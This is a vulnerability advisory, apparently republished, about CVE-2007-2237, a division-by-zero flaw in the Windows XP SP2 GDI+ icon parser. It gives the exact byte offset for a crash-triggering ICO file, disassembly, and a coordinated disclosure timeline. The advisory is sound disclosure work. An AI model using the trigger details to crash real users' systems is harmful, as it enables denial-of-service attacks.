|
|
|
|
| |
Credit:
The information has been provided by Dennis Rand.
The original article can be found at: http://www.csis.dk/dk/forside/GdiPlus.pdf
|
| |
Vulnerable Systems:
* Windows XP Service Pack 2
CSIS Security Group has discovered an Integer division by zero flaw in the GDI+ component in Windows XP. This condition are activated when a malformed ICO file are viewed through either Windows Explorer or other components like Windows Picture and Fax Viewer .
The consequence of this flaw is a Denial of Service condition, to applications using the vulnerable GDI+ component, and doing a restart of the explorer process. The flaw is in the InfoHeader -> Height value within the malformed .ICO file, when inserting 0x00000000 at byte location 31 to 34.
Disassembly of the code:
The flaw goes into the following memory area and throws the exception Integer division by zero at 4ED9E28F, Causing a restart of the explorer process.
Below is the vulnerable function:
.text:4ED9E209 ; private: int __thiscall GpIcoCodec::IsValidDIB(unsigned int)
.text:4ED9E209 ?IsValidDIB@GpIcoCodec@@AAEHI@Z proc near
.text:4ED9E209 ; CODE XREF: GpIcoCodec::ReadHeaders(void)+188p
Integer division by Zero
4ED9E28A mov eax,7FFFF000h ; 7FFFF000h = 2147479552
4ED9E28F div eax,edi ; 2147479552 / 0
Analysis:
Exploitation of the flaw will at least result in a Denial of Service condition against the program using the GDI+ component, and doing a restart of the explorer process. Further code execution has not been verified.
Timeline of public disclosure
02-04-2007 Vulnerability discovered.
17-04-2007 Research ended.
18-04-2007 CERT/CC informed
18-04-2007 Received VU#290961 from CERT/CC
25-04-2007 Received CVE-2007-2237 from CERT/CC
03-05-2007 Reported to Microsoft MSRC (secure@microsoft.com)
03-05-2007 Received response from MSRC (Case: 7402)
31-05-2007 Received response from MSRC Flaw will be fixed in next Service Pack
31-05-2007 Information released on CSIS Platinum mailing list
06-06-2007 Public release
CVE Information:
CVE-2007-2237
|
|
|
|
|
